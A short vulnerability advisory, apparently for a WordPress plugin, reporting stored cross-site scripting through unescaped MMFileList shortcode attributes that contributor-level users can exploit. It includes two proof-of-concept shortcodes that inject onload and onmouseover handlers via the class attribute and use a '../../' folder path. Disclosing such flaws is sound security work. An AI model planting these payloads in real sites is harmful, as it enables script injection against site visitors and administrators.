Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
As a contributor, put the below shortcodes in a post
[MMFileList folder='../../' format='img' class='" onload=alert(/XSS/)//'] (the folder the reach must contain images for the XSS to trigger)
[MMFileList folder='../..' class='" onmouseover=alert(/XSS/)//'] (the XSS will be triggered when moving the mouse over the generated list)